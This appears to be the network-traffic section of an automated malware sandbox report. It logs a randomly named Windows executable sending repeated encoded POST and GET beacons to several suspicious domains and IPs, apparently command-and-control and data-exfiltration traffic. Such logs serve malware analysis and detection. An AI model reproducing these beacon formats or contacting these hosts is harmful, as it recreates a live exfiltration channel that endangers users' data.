                                                                                Dec 3, 2024 14:15:16.949516058 CET5352853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:17.406455040 CET53535281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:15:31.778323889 CET5909653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:32.183105946 CET53590961.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:15:46.748620987 CET6278853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:47.407557964 CET53627881.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:01.875643015 CET6325953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:02.787623882 CET53632591.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:17.683697939 CET5102853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:18.220566034 CET53510281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:32.668149948 CET4943553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:33.228538990 CET53494351.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:48.013221025 CET5062853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:48.343424082 CET53506281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:17:02.778572083 CET6308653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:17:03.773994923 CET6308653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:17:04.789541960 CET6308653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:17:04.888649940 CET53630861.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:17:04.927383900 CET53630861.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:17:05.018323898 CET53630861.1.1.1192.168.2.5
                                                                                Session ID: 0; Source IP: 192.168.2.5; Source Port: 49754; Destination IP: 27.124.4.246; Destination Port: 80; PID: 3680
                                                                                Process: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp: Dec 3, 2024 14:13:58.195678949 CET; Bytes transferred: 520; Direction: OUT; Data:
                                                                                GET /8s5b/?dfxXf=5pgPlrExEj&PLpD=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcXPh9Hn1ejjtAgVduAuRdjiHqSVqAGkyfP7Q6Thm3wMBkWQ== HTTP/1.1
                                                                                Host: www.laohub10.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Timestamp: Dec 3, 2024 14:13:59.617350101 CET; Bytes transferred: 525; Direction: IN; Data:
                                                                                HTTP/1.1 200 OK
                                                                                Server: Apache
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Accept-Ranges: bytes
                                                                                Cache-Control: max-age=86400
                                                                                Age: 1
                                                                                Connection: Close
                                                                                Content-Length: 350
                                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                Session ID: 1; Source IP: 192.168.2.5; Source Port: 49798; Destination IP: 156.232.181.155; Destination Port: 80; PID: 3680
                                                                                Process: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp: Dec 3, 2024 14:14:16.594978094 CET; Bytes transferred: 787; Direction: OUT; Data:
                                                                                POST /abgi/ HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+cKY22ggYc1qKKXbn15GSYwFHC6LdWlj/hChgqmo=


                                                                                Session ID: 2; Source IP: 192.168.2.5; Source Port: 49805; Destination IP: 156.232.181.155; Destination Port: 80; PID: 3680
                                                                                Process: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp: Dec 3, 2024 14:14:19.256313086 CET; Bytes transferred: 807; Direction: OUT; Data:
                                                                                POST /abgi/ HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9ls4F32ZJKyApleJTTEbSMHzeWFHXEJBYyVROSN2QyCSnPuKYuUl7I1bqmNJPExWCfYPiwcTsojPnYGetXBCIZduLVBZey1y6nMBYHu7Py4U/Zd3il2c+ynjGbZ95pDpvAneOCBqNvbO6LQp/SpDqHVCW7hxQ0x9EY2KvJk5novPsB21Lbwat


                                                                                Session ID: 3; Source IP: 192.168.2.5; Source Port: 49811; Destination IP: 156.232.181.155; Destination Port: 80; PID: 3680
                                                                                Process: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp: Dec 3, 2024 14:14:21.912345886 CET; Bytes transferred: 1824; Direction: OUT; Data:
                                                                                POST /abgi/ HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                4 | 192.168.2.5 | 49817 | 156.232.181.155 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:24.564095020 CET | 524 | OUT | GET /abgi/?PLpD=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flCIvo6AFeM2/skelSXUCscL7c+OC82gfnX3ulNzXIVMD/Pg==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:26.423707008 CET | 709 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 566
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                5 | 192.168.2.5 | 49837 | 185.27.134.206 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:32.242265940 CET | 799 | OUT | POST /4d2l/ HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.canadavinreport.site
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=UEpJ+8Bwbd3RRNUXihIKlmwsTpeuIwJl79M/N+4BBKL80KHTHcMp6lPFQQliFru7pwa2qgKwk3Z8ZTPf9txMYZ042OLRbUdVtXtYKbdQ7Hz8dqlLu+9q9V3luYPmeugLiiv2osQYq1NAUT0dc7lLfyagiuASlKFZHVeunuDuNi5982o66mGAnxE8JHdFU3UA+wwecJQ=
                                                                                Dec 3, 2024 14:14:33.522542953 CET | 685 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:33 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Content-Encoding: br


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.2.5 | 49843 | 185.27.134.206 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:34.913707018 CET | 819 | OUT | POST /4d2l/ HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.canadavinreport.site
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZv81r3TAYYpz1PFIglnBruOpwWEqh2wkzx8ZRXf+epNbp06u+LTGEdVtXtYKbJ27Hr8dZNL8qppx13ktYPmVOgPiiubooQyq2lAUSEdbqlMRCbKmuAAlacpPkWwjc6TaRt25AZQgEOo0RoEZUVyFH1pkTguCeEIKCJ+bluD/mnW/Doh85Dy
                                                                                Dec 3, 2024 14:14:36.197098017 CET | 685 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:36 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Content-Encoding: br


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                7 | 192.168.2.5 | 49850 | 185.27.134.206 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:37.686753988 CET | 1836 | OUT | POST /4d2l/ HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.canadavinreport.site
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:38.897469997 CET | 685 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:38 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Content-Encoding: br


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.2.5 | 49856 | 185.27.134.206 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:40.593611956 CET | 528 | OUT | GET /4d2l/?PLpD=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMD88Lp4PQNylErUlYa6FSt3/cQZlayrlv3UKLh53gU+l17w==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:41.763470888 CET | 1196 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 995
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5251b24cd521712a038954f2dd56d894");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMD88Lp4PQNylErUlYa6FSt3/cQZlayrlv3UKLh53gU+l17w==&dfxXf=5pgPlrExEj&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                9 | 192.168.2.5 | 49874 | 88.99.61.52 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:47.828804970 CET | 778 | OUT | POST /ogj2/ HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.phoenix88.sbs
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.phoenix88.sbs/ogj2/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=F/4Ipjr2NB0HQBfB8rEkMo1UP1y3uFZge4xlIPpYC588vo6B11Y6vOQCldDq7cDotbcbh3qM2Tzb4ON47VI8Q8jXT0HzIHDxN+nqAHlzQEW+RBqylS0c+EHxDFWRIn6nLO8eDtwFNUwcdv+RSHoXoK8ymasBH/hw67O+F8z454AzISASLN8GpHNnuqxeibGxiz1Gtl8=
                                                                                Dec 3, 2024 14:14:49.147865057 CET | 1020 | IN | HTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:48 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                10 | 192.168.2.5 | 49879 | 88.99.61.52 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:50.492878914 CET | 798 | OUT | POST /ogj2/ HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.phoenix88.sbs
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.phoenix88.sbs/ogj2/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=F/4Ipjr2NB0HC0PB/IskKI1XAVy38FYpe41lIOtICKY8vNeB0xM6oOQCwtDvj8DztbYTh3WM2T3b4Lx4ny0/QsjVNUHxXXDxN+nqAHZVQEO+Rxaykz0b3kHyT1WRMn6jLO9JDvVYNS8cduORRWoUhK80iatNBPkY06GnBdW/qI4oEEx4Rv0u6nhf+55pzrnY4Ql2zyoJXft7w/AmqZlkiYHo3XYA
                                                                                Dec 3, 2024 14:14:51.843071938 CET | 1020 | IN | HTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:51 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                11 | 192.168.2.5 | 49885 | 88.99.61.52 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:53.165179968 CET | 1815 | OUT | POST /ogj2/ HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.phoenix88.sbs
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.phoenix88.sbs/ogj2/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:54.482547998 CET | 1020 | IN | HTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:54 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                12 | 192.168.2.5 | 49890 | 88.99.61.52 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:14:55.835191965 CET | 521 | OUT | GET /ogj2/?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9cY7ZSSO0fgv4aLrmeCdeR22hUyiHphs3+UPMeFnjEXz3Vw==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:57.142148972 CET | 1175 | IN | HTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:56 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9cY7ZSSO0fgv4aLrmeCdeR22hUyiHphs3+UPMeFnjEXz3Vw==&dfxXf=5pgPlrExEj
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                13 | 192.168.2.5 | 49903 | 104.21.90.137 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:02.664835930 CET | 790 | OUT | POST /eaqq/ HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=AzG7TTHt+g90MJQ6LY7+1hXnX35zrmiwj0xm38+/F2kZQHr7Nsfiv1cTa8dON/ArQkbNJUdIMMv3uTVnEkoVRZCOPqlBS6qdTyTlcSf9VPwITm4deDeDysSKdONrCDm1fIIpWsvEIBmjRwb/1/w1caFnppREtV5AkSZIZlGmkKBemhF+iU+HDCa1w0J+PkCJ9oTyFjQ=
                                                                                Dec 3, 2024 14:15:03.796664000 CET | 902 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:03 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
